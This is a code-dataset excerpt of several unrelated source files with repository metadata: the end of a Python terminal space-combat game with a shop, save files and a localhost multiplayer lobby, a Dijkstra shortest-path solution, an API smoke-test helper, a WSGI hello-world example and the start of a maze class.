another\r\n# function to load the map in. \r\ndef map_commands(cmd, cur_map):\r\n \r\n if cmd == 'w' and cur_map[mapData.pos_x - 1][mapData.pos_y] not in mapData.walls:\r\n if cur_map[mapData.pos_x - 1][mapData.pos_y] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_x -= 1\r\n \r\n elif cmd == 's' and cur_map[mapData.pos_x + 1][mapData.pos_y] not in mapData.walls:\r\n if cur_map[mapData.pos_x + 1][mapData.pos_y] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_x += 1\r\n \r\n elif cmd == 'a' and cur_map[mapData.pos_x][mapData.pos_y - 1] not in mapData.walls:\r\n if cur_map[mapData.pos_x][mapData.pos_y - 1] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_y -= 2\r\n \r\n elif cmd == 'd' and cur_map[mapData.pos_x][mapData.pos_y + 1] not in mapData.walls:\r\n if cur_map[mapData.pos_x][mapData.pos_y + 1] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_y += 2\r\n \r\n\r\n ## exit command\r\n elif cmd == '\\x1b':\r\n clear()\r\n print('\\n\\n > EXIT? [ENTER] TO CONFIRM')\r\n confirmation = bytes.decode(getch())\r\n\r\n if confirmation == '\\r':\r\n sys.exit(0)\r\n else:\r\n pass\r\n \r\n\r\n # ## Enter on command console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.command_console_positions:\r\n globalStates.current_commands = console_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.console_menu\r\n\r\n ## shop console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.shop_console_positions:\r\n globalStates.current_commands = shop_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.shop_menu\r\n\r\n ## upgrade console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.upgrade_console_positions:\r\n globalStates.current_commands = upgrade_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.upgrade_menu\r\n\r\n\r\n\r\n \r\n\r\ndef console_commands(cmd, cur_map):\r\n \r\n ## Combat\r\n if cmd == '1': \r\n\r\n ### initialize enemy to fight ###\r\n ## Random rank var\r\n rank = random.choice(enemyData.ranks)\r\n \r\n ## Random name var\r\n name = random.choice(enemyData.names)\r\n\r\n\r\n ## randomize hp and basedam \r\n ## These are calculated based on the players current stat level\r\n ## --prone to tweaking, balance is still in progress\r\n en_hp = random.randint(int(round(playerData.STATS / 5)), int(round(playerData.STATS / 2.5))) + 6\r\n en_basedam = random.randint(int(round(playerData.STATS / 25)), int(round(playerData.STATS / 18)))\r\n \r\n ## if the base damage is rounded down to 0, set to 1- enemeies need to always do damage\r\n if en_basedam < 1:\r\n en_basedam = 1\r\n\r\n \r\n ## initialize randomized enemy instance, assign its above info and add the face and messages\r\n enemyData.current_enemy = enemyClass(rank, name, en_hp, en_basedam, faces.shopkeeper.face, faces.shopkeeper.messages)\r\n \r\n ## enemy speaks before combat\r\n dialoguePrompt(enemyData.current_enemy.face, enemyData.current_enemy.messages)\r\n\r\n ## combat map/cmds\r\n globalStates.current_commands = combat_commands\r\n globalStates.current_map = staticMaps.combat_map_enemy\r\n\r\n # player gold reward for victory assigned beforehand so sue me. if you die you lose anyway \r\n won_gold = int(round(enemyData.current_enemy.hp / 2)) + random.randint(2, 8)\r\n playerData.STATS += int(round(enemyData.current_enemy.hp / 8)) ### maybe just make it like 2 or 3 \r\n playerData.GOLD += won_gold\r\n globalStates.won_gold = won_gold\r\n\r\n\r\n ## goto SOCKET MULTIPLAYER\r\n elif cmd == '2': \r\n globalStates.current_map = staticMaps.multiplayer_menu\r\n globalStates.current_commands = multiplayer_lobby_commands\r\n \r\n \r\n ## SAVE \r\n elif cmd == '3':\r\n clear()\r\n save_game()\r\n\r\n ## LOAD\r\n elif cmd == '4':\r\n clear()\r\n load_game()\r\n\r\n else:\r\n globalStates.current_map = globalStates.return_map\r\n globalStates.current_commands = map_commands\r\n\r\n\r\ndef shop_commands(cmd, cur_map):\r\n\r\n gp = playerData.GOLD\r\n no_gp = '\\n ** NOT ENOUGH GOLD **'\r\n\r\n if cmd == '1':\r\n if gp >= 10:\r\n playerData.REPAIRKITS += 1\r\n print('\\n +REPAIRKIT PURCHASED+')\r\n\r\n playerData.GOLD -= 10\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n\r\n elif cmd == '2':\r\n if gp >= 10:\r\n playerData.MISSILES += 1\r\n print('\\n +MISSILE PURCHASED+')\r\n \r\n playerData.GOLD -= 10\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n else:\r\n globalStates.current_commands = map_commands\r\n globalStates.current_map = globalStates.return_map\r\n\r\n\r\ndef upgrade_commands(cmd, cur_map):\r\n\r\n gp = playerData.GOLD\r\n no_gp = '\\n ** NOT ENOUGH GOLD **'\r\n \r\n if cmd == '1':\r\n if gp >= 20:\r\n playerData.CANNON_DAM += 1\r\n print('\\n +CANNON UPGRADED +')\r\n\r\n playerData.GOLD -= 20\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n\r\n elif cmd == '2':\r\n if gp >= 15:\r\n playerData.MAX_HP += 5\r\n playerData.HP = playerData.MAX_HP\r\n print('\\n +SHIELD UPGRADED +')\r\n\r\n playerData.GOLD -= 15\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n else:\r\n globalStates.current_commands = map_commands\r\n globalStates.current_map = globalStates.return_map\r\n\r\n\r\n\r\ndef multiplayer_lobby_commands(cmd, cur_map):\r\n \r\n ## JOIN SERVER\r\n if cmd == '1':\r\n clear()\r\n\r\n ## input port #\r\n port = input('\\n\\n\\t!-SAVE YOUR GAME BEFORE CONNECTING\\n\\n\\t>> ENTER SERVERS PORT NUMBER\\n\\t>> ')\r\n \r\n if port == '':\r\n pass\r\n \r\n ## if port is too high or low, return to menu\r\n elif int(port) > 65000 or int(port) < 6000:\r\n print('\\n\\t>> THIS PORT NUMBER IS OUT OF VALID RANGE <<')\r\n getch()\r\n\r\n ## try to validate port and connect\r\n else:\r\n clear()\r\n connected = False\r\n \r\n HOST = '127.0.0.1'\r\n \r\n clientData.PORT = int(port)\r\n CLIENT = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n ## Attempt connection. If refused or failed to connect, report to player\r\n try:\r\n CLIENT.connect((HOST, int(port)))\r\n connected = True\r\n\r\n except ConnectionRefusedError:\r\n clear()\r\n print('\\n\\n\\t>> CONNECTION REFUSED <<\\n\\n\\t port may be invalid')\r\n getch()\r\n \r\n if connected:\r\n \r\n ## assign player variables to vars in client data\r\n clientData.PL_HP = playerData.HP\r\n clientData.PL_MAX_HP = playerData.MAX_HP\r\n clientData.PL_DAM = playerData.CANNON_DAM\r\n clientData.PL_MISSILES = playerData.MISSILES\r\n clientData.PL_REPAIRKITS = playerData.REPAIRKITS\r\n \r\n ## Connect to server and send player stats\r\n try:\r\n clientData.client_connect(CLIENT)\r\n clientData.send_stats(CLIENT)\r\n\r\n except ConnectionResetError:\r\n print('\\n\\t>> CONNECTION LOST\\n\\t>> SERVER MAY HAVE CRASHED OR BEEN CLOSED')\r\n getch()\r\n return\r\n\r\n ## run game loop\r\n loot_plus = clientData.main_loop(CLIENT)\r\n\r\n ## Get loot\r\n playerData.GOLD += loot_plus\r\n\r\n getch()\r\n\r\n ## run client commands, let client.py take over here\r\n\r\n\r\n ## RUN SERVER ##\r\n elif cmd == '2':\r\n\r\n clear()\r\n\r\n ## print port data and help\r\n print('''\r\n [*] PORT MUST BE BELOW 65000 AND OVER 6000.\r\n IF PORT IS VALID, SERVER WILL OPEN IN A \r\n NEW TERMINAL WINDOW AND RUN IN THE BACK-\r\n GROUND. AFTER CREATING SERVER, BOTH THE\r\n PLAYERS MUST CONNECT FROM PREVIOUS MENU. \r\n ''')\r\n\r\n ## get port #\r\n port = input('\\n\\n\\t>> ENTER A VALID PORT NUMBER\\n\\t>> ')\r\n\r\n ## break by entering nothing\r\n if port == '':\r\n pass\r\n \r\n ## if port is too high or low, return to menu\r\n elif int(port) > 65000 or int(port) < 6000:\r\n print('\\n\\t>> THIS PORT NUMBER IS OUT OF VALID RANGE <<')\r\n getch()\r\n\r\n ## otherwise run server with port num as cmdline argument\r\n else:\r\n ## get current dir for filepath to run server\r\n dir_path = os.getcwd()\r\n ## run server. start is the command, cmd is the window, /K means open and keep it open\r\n os.system('start cmd /K ' + dir_path + '\\\\server.py ' + port)\r\n\r\n else:\r\n globalStates.current_commands = console_commands\r\n globalStates.current_map = staticMaps.console_menu\r\n\r\n\r\n\r\ndef combat_commands(cmd, cur_map):\r\n\r\n turn_completed = False\r\n\r\n ## generate random number for critical roll. If 1, player misses attack. If 20, player does heavier critical attack\r\n critical_generator = random.randint(1,20)\r\n\r\n ## Cannon ##\r\n if cmd == '1':\r\n\r\n if critical_generator == 1:\r\n\r\n clear()\r\n print_combat_screen(1)\r\n print(f'\\n\\tYour Attack MISSES')\r\n getch()\r\n\r\n elif critical_generator == 20:\r\n \r\n ## Generate random critical damage amount from 1.5x player cannondam to 2x\r\n crit_damage = random.randint(int(round(playerData.CANNON_DAM * 1.5)), int(round(playerData.CANNON_DAM * 2.5))) + random.randint(1,4)\r\n\r\n ## Remove damage amt from enemy HP\r\n enemyData.current_enemy.hp -= crit_damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCritical Cannon hit for {str(crit_damage)} dam!')\r\n getch()\r\n\r\n else:\r\n # Generate randomized damage number from player base damage and a +4 upper range\r\n damage = random.randint(playerData.CANNON_DAM, playerData.CANNON_DAM + 4)\r\n\r\n # Remove damage number from enemy HP\r\n enemyData.current_enemy.hp -= damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCannon does {str(damage)} dam')\r\n getch()\r\n\r\n # Continue to enemy turn\r\n turn_completed = True\r\n\r\n\r\n ## Missiles ##\r\n elif cmd == '2':\r\n\r\n # Use missile if avaliable\r\n if playerData.MISSILES > 0:\r\n \r\n ## subtract missile from inventory\r\n playerData.MISSILES -= 1\r\n\r\n\r\n if critical_generator == 1:\r\n\r\n print_combat_screen(1)\r\n print(f'\\n\\tYour Missile MISSES')\r\n getch()\r\n\r\n elif critical_generator == 20:\r\n \r\n ## Generate random critical damage amount from 1.5x player cannondam to 2x\r\n crit_damage = random.randint(int(round(playerData.CANNON_DAM * 2.5)), int(round(playerData.CANNON_DAM * 4.5))) + random.randint(3,8)\r\n\r\n ## Remove damage amt from enemy HP\r\n enemyData.current_enemy.hp -= crit_damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCritical Missile hit for {str(crit_damage)} dam!')\r\n getch()\r\n \r\n else:\r\n ## Generate random number. Missile damage starts at +4 player basedamage and goes up to +9 added. Powerful shit.\r\n damage = random.randint(playerData.CANNON_DAM + 4, playerData.CANNON_DAM + 9)\r\n\r\n # Subtract missile damage from enemy HP\r\n enemyData.current_enemy.hp -= damage\r\n\r\n # No negative HP on screen.\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n \r\n clear()\r\n\r\n ## Print damage report to screen\r\n print_combat_screen(1)\r\n print(f'\\n\\tMissile does {str(damage)} dam')\r\n getch()\r\n\r\n # Continue to enemy turn\r\n turn_completed = True\r\n \r\n # Otherwise, too bad sonnyboy.\r\n else:\r\n print('\\t** NO MISSILES **')\r\n getch()\r\n\r\n\r\n ## Repair ##\r\n elif cmd == '3':\r\n\r\n # Check for repairkit in inventory and that your health isn't maxed already.\r\n if playerData.REPAIRKITS > 0 and playerData.HP == playerData.MAX_HP:\r\n print('\\t** HEALTH MAXIMUM **')\r\n getch()\r\n\r\n # Otherwise, go through with repair-\r\n elif playerData.REPAIRKITS > 0:\r\n \r\n # Remove RKit from inventory\r\n playerData.REPAIRKITS -= 1\r\n\r\n ## calculate repairkit amount\r\n repair_amount = 10 + int(round(playerData.STATS * .08))\r\n\r\n ## If player health plus repairkit is more than their max hp, just make it equal max hp\r\n if (playerData.HP + repair_amount) > playerData.MAX_HP:\r\n playerData.HP = playerData.MAX_HP\r\n \r\n ## Otherwise add the repair amount to their HP\r\n else:\r\n playerData.HP += repair_amount\r\n\r\n clear()\r\n\r\n ## Update screen with repair data \r\n print_combat_screen(1)\r\n print(f'\\n\\tShip Repaired +{str(repair_amount)} hp')\r\n getch()\r\n \r\n ## End Turn\r\n turn_completed = True\r\n\r\n else:\r\n print('\\t** NO REPAIRKITS **')\r\n getch()\r\n\r\n else:\r\n pass\r\n\r\n ## Once turn is completed and the enemy isn't dead, go to enemy turn\r\n if turn_completed and enemyData.current_enemy.hp > 0:\r\n enemyTurn()\r\n\r\n\r\ndef enemyTurn():\r\n\r\n clear()\r\n\r\n ## Generate critical chances\r\n critical_generator = random.randint(1,17)\r\n\r\n ## Check for miss or crit hit\r\n if critical_generator == 1:\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} MISSES!')\r\n getch()\r\n \r\n elif critical_generator == 2:\r\n\r\n crit_damage = random.randint(int(round(enemyData.current_enemy.basedam * 1.5)), int(round(enemyData.current_enemy.basedam * 2.5))) + 3\r\n\r\n ## Remove damage amount from player HP\r\n playerData.HP -= crit_damage\r\n\r\n ## No negative HP on screen\r\n if playerData.HP < 0:\r\n playerData.HP = 0\r\n \r\n ## Update screen with damage results\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} CRITICALLY attacks for -{str(crit_damage)} dam')\r\n getch()\r\n\r\n else:\r\n\r\n ## Damage range for enemy based on their base damage with a +3 range\r\n player_dam = random.randint(enemyData.current_enemy.basedam, enemyData.current_enemy.basedam + 3)\r\n \r\n ## Remove damage amount from player HP\r\n playerData.HP -= player_dam\r\n\r\n ## No negative HP on screen\r\n if playerData.HP < 0:\r\n playerData.HP = 0\r\n \r\n ## Update screen with damage results\r\n print_combat_screen(2)\r\n print(f'\\n\\t{enemyData.current_enemy.name} attacks for -{str(player_dam)} dam')\r\n getch()\r\n\r\n ## Death screen if killed. If you see this stuff in game, do better next time I guess.\r\n if playerData.HP <= 0:\r\n clear()\r\n ## Change lol\r\n print('\\n\\n\\n\\tYOU HAVE DIED\\n\\n\\tsucks to fuckin suck fuckeroni')\r\n getch()\r\n sys.exit()\r\n\r\n\r\n\r\n####################################\r\n##### SAVE / LOAD #####\r\n####################################\r\n\r\ndef save_game():\r\n ## SAVE ORDER: xpos, ypos, current_map, pl_hp, pl_gold, missiles, maxhp, stats, repairkits, candam\r\n save_xpos = str(mapData.pos_x)\r\n save_ypos = str(mapData.pos_y)\r\n save_cur_map = str(mapData.load_map_list.index(globalStates.return_map))\r\n save_hp = str(playerData.HP)\r\n save_gold = str(playerData.GOLD)\r\n save_missiles = str(playerData.MISSILES)\r\n save_max_hp = str(playerData.MAX_HP)\r\n save_stats = str(playerData.STATS)\r\n save_repairkits = str(playerData.REPAIRKITS)\r\n save_cannon_dam = str(playerData.CANNON_DAM)\r\n\r\n\r\n clear()\r\n ## Print save files and ask for file input \r\n saveFiles = []\r\n for filename in os.listdir('.'):\r\n if filename.startswith('savegame'):\r\n saveFiles.append(filename)\r\n print('\\n --SAVE AS:')\r\n print(' [1] New Save')\r\n\r\n i = 2\r\n for file in saveFiles:\r\n print(' ['+str(i)+'] '+file)\r\n i +=1\r\n print('\\n ['+str(i)+'] Back')\r\n\r\n fileChoice = bytes.decode(getch())\r\n\r\n ## Name new save file\r\n invalidChars = ['?', '\\\\', '/', ':', '\"', '<', '>', '*']\r\n if fileChoice == str(i):\r\n return\r\n else:\r\n if fileChoice == '1':\r\n ## CHECK IF 7+ save files already\r\n if len(saveFiles) >= 7:\r\n print('\\n MAXIMUM NUMBER OF SAVE FILES REACHED')\r\n getch()\r\n return \r\n else:\r\n clear()\r\n print(' ENTER A NAME FOR FILE:')\r\n name = input(' > ')\r\n for i in invalidChars:\r\n if i in name:\r\n print('\\n #INVALID CHARACTERS IN NAME#')\r\n input()\r\n return\r\n openfile = open('savegame_'+name+'.txt', 'w+')\r\n \r\n ## Try to open and rewrite save file\r\n else:\r\n try:\r\n openfile = open(saveFiles[int(fileChoice)-2], 'w+')\r\n except (ValueError, IndexError):\r\n print('> Unable to save to this file')\r\n getch()\r\n return\r\n\r\n\r\n ## WRITE DATA TO FILE\r\n ## SAVE ORDER: xpos, ypos, current_map, pl_hp, pl_gold missiles, maxhp, stats\r\n openfile.truncate()\r\n openfile.write(save_xpos); openfile.write(\"\\n\")\r\n openfile.write(save_ypos); openfile.write(\"\\n\")\r\n openfile.write(save_cur_map); openfile.write(\"\\n\")\r\n openfile.write(save_hp); openfile.write(\"\\n\")\r\n openfile.write(save_gold); openfile.write(\"\\n\")\r\n openfile.write(save_missiles); openfile.write(\"\\n\")\r\n openfile.write(save_max_hp); openfile.write(\"\\n\")\r\n openfile.write(save_stats); openfile.write(\"\\n\")\r\n openfile.write(save_repairkits) ; openfile.write(\"\\n\")\r\n openfile.write(save_cannon_dam) ; openfile.write(\"\\n\") \r\n\r\n print(f'\\n ** GAME SAVED **')\r\n getch()\r\n \r\n\r\ndef load_game():\r\n clear()\r\n\r\n ## List out all saved games in current directory\r\n saved_files_list = []\r\n for savefile in os.listdir('.'):\r\n if savefile.startswith('savegame'):\r\n saved_files_list.append(savefile)\r\n \r\n ## Print the saved files\r\n print('\\n -- SAVE FILES --')\r\n \r\n ## index numb for printing and selection\r\n i = 1\r\n for file in saved_files_list:\r\n print(' ['+str(i)+'] '+file)\r\n i+=1\r\n\r\n print('\\n ['+str(i)+'] BACK')\r\n \r\n file_choice = bytes.decode(getch())\r\n\r\n if file_choice == str(i):\r\n return\r\n else:\r\n try:\r\n load_file = open(saved_files_list[int(file_choice)-1])\r\n except (ValueError, IndexError):\r\n return\r\n \r\n try:\r\n ## LOAD DATA FROM FILE\r\n ## ORDER: xpos, ypos, current_map, pl_hp, pl_gold, missiles, maxhp, stats, repairkits, candam\r\n load_xpos = int(load_file.readline())\r\n load_ypos = int(load_file.readline())\r\n load_cur_map = int(load_file.readline())\r\n load_pl_hp = int(load_file.readline())\r\n load_pl_gold = int(load_file.readline())\r\n load_pl_missiles = int(load_file.readline())\r\n load_pl_max_hp = int(load_file.readline())\r\n load_pl_stats = int(load_file.readline())\r\n load_pl_repairkits = int(load_file.readline())\r\n load_pl_cannon_dam = int(load_file.readline())\r\n load_file.close()\r\n \r\n mapData.pos_x = load_xpos\r\n mapData.pos_y = load_ypos\r\n globalStates.current_map = mapData.load_map_list[load_cur_map]\r\n playerData.HP = load_pl_hp\r\n playerData.GOLD = load_pl_gold\r\n playerData.MISSILES = load_pl_missiles\r\n playerData.MAX_HP = load_pl_max_hp\r\n playerData.STATS = load_pl_stats\r\n playerData.REPAIRKITS = load_pl_repairkits\r\n playerData.CANNON_DAM = load_pl_cannon_dam\r\n \r\n print('\\n GAME LOADED')\r\n getch()\r\n\r\n globalStates.current_commands = map_commands\r\n \r\n\r\n except ValueError:\r\n clear()\r\n print('\\n\\n # SAVE FILE CORRUPTED OR EMPTY #')\r\n print(' # PLEASE SELECT A DIFFERENT FILE #')\r\n print('\\n [press key]')\r\n getch()\r\n \r\n\r\n\r\n\r\n####################################\r\n##### THE OL GAME LOOP #####\r\n#################################### \r\n\r\n\r\ndef Main():\r\n\r\n while True:\r\n\r\n ## Assign current screen (map, menu, combat) to be printed and modified\r\n current_screen = globalStates.current_map\r\n ## Assign uncalled command function for current maps avaliable inputs\r\n current_command = globalStates.current_commands\r\n\r\n clear()\r\n \r\n ## Gameplay for menus- static screens with options instead of motion\r\n if current_screen in globalStates.static_maps:\r\n if current_screen != staticMaps.menu: \r\n print(f'\\n HP: {str(playerData.HP)}/{str(playerData.MAX_HP)} G: {str(playerData.GOLD)}')\r\n for line in current_screen:\r\n print(line)\r\n \r\n ## COMBAT MODE\r\n elif current_screen in globalStates.combat_maps:\r\n \r\n ## While enemy is still alive, keep combat going\r\n if enemyData.current_enemy.hp > 0:\r\n ## Print combat map and character data\r\n print_combat_screen(0)\r\n \r\n ## Player death condition ############## dubious at best\r\n elif playerData.HP <= 0:\r\n clear()\r\n print('\\n\\n\\n\\tYOU HAVE DIED\\n\\n\\tsucks to fuckin suck fuckeroni')\r\n getch()\r\n sys.exit()\r\n \r\n ## Enemy death\r\n else:\r\n globalStates.current_map = staticMaps.console_menu\r\n globalStates.current_commands = console_commands\r\n\r\n ## random event, 1 in 6 chance player gets a free missile\r\n win_event = random.randint(1,8)\r\n \r\n ## victory message\r\n print(f'\\n\\n\\t +++VICTORY+++ \\n\\n\\t{enemyData.current_enemy.name} is defeated\\n\\n\\t +{str(globalStates.won_gold)}gp')\r\n \r\n ## if win, give shit and whatnot\r\n if win_event == 2:\r\n print('\\n You scavenge +1 missile')\r\n playerData.MISSILES += 1\r\n elif win_event == 8:\r\n print('\\n You scavenge +1 repairkit')\r\n playerData.REPAIRKITS += 1\r\n\r\n getch()\r\n continue\r\n\r\n\r\n ## GAMEPLAY DYNAMIC MODE\r\n else:\r\n ## erase last player location\r\n overwrite_map(current_screen)\r\n ## Set current coordinates on the map to pl character\r\n current_screen[mapData.pos_x][mapData.pos_y] = 'X'\r\n print_map(current_screen)\r\n\r\n \r\n ## Get the ol player input key\r\n player_input = bytes.decode(getch())\r\n\r\n ## Run input through the current commands to get results\r\n returnAction = current_command(player_input, current_screen)\r\n \r\n\r\n\r\n## Assign player commands at runtime\r\nglobalStates.current_commands = map_commands\r\nMain()","repo_name":"orsini1138/AmEn2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72553883432","text":"import heapq\nimport sys\n\ninput = sys.stdin.readline\n\nV, E = map(int, input().split())\nK = int(input())\ngraph = [[] for y in range(V + 1)]\n\nINF = int(1e9)\nfor _ in range(E):\n u, v, w = map(int, input().split())\n graph[u].append((v,w))\n\n#print(graph)\nD = [INF] * (V + 1)\n\ndef dijkstra(start):\n q = []\n heapq.heappush(q, (0,start))\n D[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n if D[now] < dist:\n continue\n for i in graph[now]: # 0: dist 1: weight\n cost = dist + i[1]\n if cost < D[i[0]]:\n D[i[0]] = cost\n heapq.heappush(q, (cost,i[0]))\n\ndijkstra(K)\n\nfor i in range(1, V + 1):\n if D[i] == INF:\n print('INF')\n else:\n print(D[i])\n\n","repo_name":"jayyeong/Algorithm","sub_path":"Baekjoon/BOJproblem/BOJ1753최단경로_2.py","file_name":"BOJ1753최단경로_2.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"455550629","text":"# coding: utf8\n\ndef _get_thread_urls(thread):\n \"\"\"Вызов нитки с разными параметрами\"\"\"\n return [\n lambda: f'v3/thread/?uid={thread.uid}',\n lambda: f'v3/thread/?uid={thread.uid}&date={thread.start_date}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}'\n f'&date={thread.start_date}',\n lambda: f'v3/thread/?uid={thread.uid}&from={thread.station_from}&to={thread.station_to}'\n f'&date={thread.start_date}&result_timezone=Europe%2FLondon',\n ]\n\n\nclass ThreadParams(object):\n \"\"\"Нитка, полученная в поиске, и используемая потом для вызова ручки нитки\"\"\"\n def set_params(self, uid, station_from, station_to, start_date):\n self.uid = uid\n self.station_from = station_from\n self.station_to = station_to\n self.start_date = start_date\n\n\nclass SetThread(object):\n def __init__(self, thread):\n self.thread = thread\n\n def __call__(self, checker, response):\n segment = response.json()['segments'][0]\n\n self.thread.set_params(\n uid=segment['thread']['uid'],\n station_from=segment['from']['code'],\n station_to=segment['to']['code'],\n start_date=segment['start_date']\n )\n\n\ndef check_threads(search_url, search_url_params):\n \"\"\"\n Запуск тестов для нитки\n :param search_url: поиск, из результатов которого выбирается нитка\n :param params: параметры для вызова поиска\n \"\"\"\n thread = ThreadParams()\n url_params = search_url_params.copy()\n url_params['processes'] = [SetThread(thread)]\n thread_urls = _get_thread_urls(thread)\n\n return [\n search_url,\n url_params,\n thread_urls\n ]\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/smoke_tests/smoke_tests/config/api_public/content_checkers.py","file_name":"content_checkers.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2821118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr'''\n # Web开发-WSGI接口:WSGI处理函数\n # 使用场景:\n 正确的做法是底层代码由专门的服务器软件实现,我们用Python专注于生成HTML文档。因为我们不希望接触到TCP连接、HTTP原始请求和响应格式,所以,需要一个统一的接口,让我们专心用Python编写Web业务。\n 这个接口就是WSGI:Web Server Gateway Interface。\n WSGI接口定义非常简单,它只要求Web开发者实现一个函数,就可以响应HTTP请求。我们来看一个最简单的Web版本的“Hello, web!”:\n def application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [b'

Hello, web!

'] \n 上面的application()函数就是符合WSGI标准的一个HTTP处理函数,它接收两个参数:\n 1、environ:一个包含所有HTTP请求信息的dict对象;\n 2、start_response:一个发送HTTP响应的函数。 \n 在application()函数中,调用:\n start_response('200 OK', [('Content-Type', 'text/html')])\n 就发送了HTTP响应的Header,注意Header只能发送一次,也就是只能调用一次start_response()函数。start_response()函数接收两个参数,一个是HTTP响应码,一个是一组list表示的HTTP Header,每个Header用一个包含两个str的tuple表示。\n 通常情况下,都应该把Content-Type头发送给浏览器。其他很多常用的HTTP Header也应该发送。\n 然后,函数的返回值b'

Hello, web!

'将作为HTTP响应的Body发送给浏览器。\n 有了WSGI,我们关心的就是如何从environ这个dict对象拿到HTTP请求信息,然后构造HTML,通过start_response()发送Header,最后返回Body。\n 整个application()函数本身没有涉及到任何解析HTTP的部分,也就是说,底层代码不需要我们自己编写,我们只负责在更高层次上考虑如何响应请求就可以了。\n 不过,等等,这个application()函数怎么调用?如果我们自己调用,两个参数environ和start_response我们没法提供,返回的bytes也没法发给浏览器。\n 所以application()函数必须由WSGI服务器来调用。有很多符合WSGI规范的服务器,我们可以挑选一个来用。但是现在,我们只想尽快测试一下我们编写的application()函数真的可以把HTML输出到浏览器,所以,要赶紧找一个最简单的WSGI服务器,把我们的Web应用程序跑起来。\n 好消息是Python内置了一个WSGI服务器,这个模块叫wsgiref,它是用纯Python编写的WSGI服务器的参考实现。所谓“参考实现”是指该实现完全符合WSGI标准,但是不考虑任何运行效率,仅供开发和测试使用。 \n\n'''\n# 我们先编写*_hello*.py,实现Web应用程序的WSGI处理函数:\n\ndef application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n path = environ['PATH_INFO'].encode('iso-8859-1').decode('utf-8')[1:]\n # print('path =', path)\n body = '

Hello, %s!

' % (path or 'web') # 解决输入中文乱码问题,不可以输中文: (environ['PATH_INFO'][1:] or 'web')\n # print('body =', body)\n return [body.encode('utf-8')] # 中文换为:[body.encode('gbk')]\n # return [b'

Hello, Web!

']\n\nr'''\n #注:然后,再编写一个*_server*.py,负责启动WSGI服务器,加载application()函数;\n 如果你觉得这个Web应用太简单了,可以稍微改造一下,从environ里读取PATH_INFO,这样可以显示更加动态的内容:\n # *_hello*.py可以做如下改造\n def application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n body = '

Hello, %s!

' % (environ['PATH_INFO'][1:] or 'web')\n return [body.encode('utf-8')]\n\n'''","repo_name":"CowryGolden/PythonTest","sub_path":"test/web_dev_wsgi_application_hello_test1.py","file_name":"web_dev_wsgi_application_hello_test1.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30340051829","text":"# handles interaction between user_main.py, player.py, prim.py and kruskal.py\r\n# also handles drawing the maze boards\r\n\r\nfrom player import *\r\nfrom random import *\r\nfrom prim import *\r\nfrom kruskal import *\r\nfrom math import *\r\n\r\nclass Maze(object):\r\n puzzles = [\"kruskal\", \"prim\"]\r\n\r\n def initMaze(rows, cols, value=None):\r\n # returns 2D Maze Board \r\n # copied from https://www.cs.cmu.edu/~112/notes/notes-2d-lists.html\r\n a = []\r\n for row in range(rows):\r\n for col in range(cols):\r\n a += [ [value] * cols]\r\n return a\r\n\r\n def __init__(self, rows, cols, cellSize, width, height, puzzle=\"\"):\r\n # initializes a type of puzzle randomly only for debugging purposes\r\n self.rows = rows\r\n self.cols = cols\r\n self.board = Maze.initMaze(rows, cols)\r\n self.cellSize = cellSize\r\n self.width = width\r\n self.height = height\r\n self.player = Player(cellSize)\r\n self.walls = None\r\n 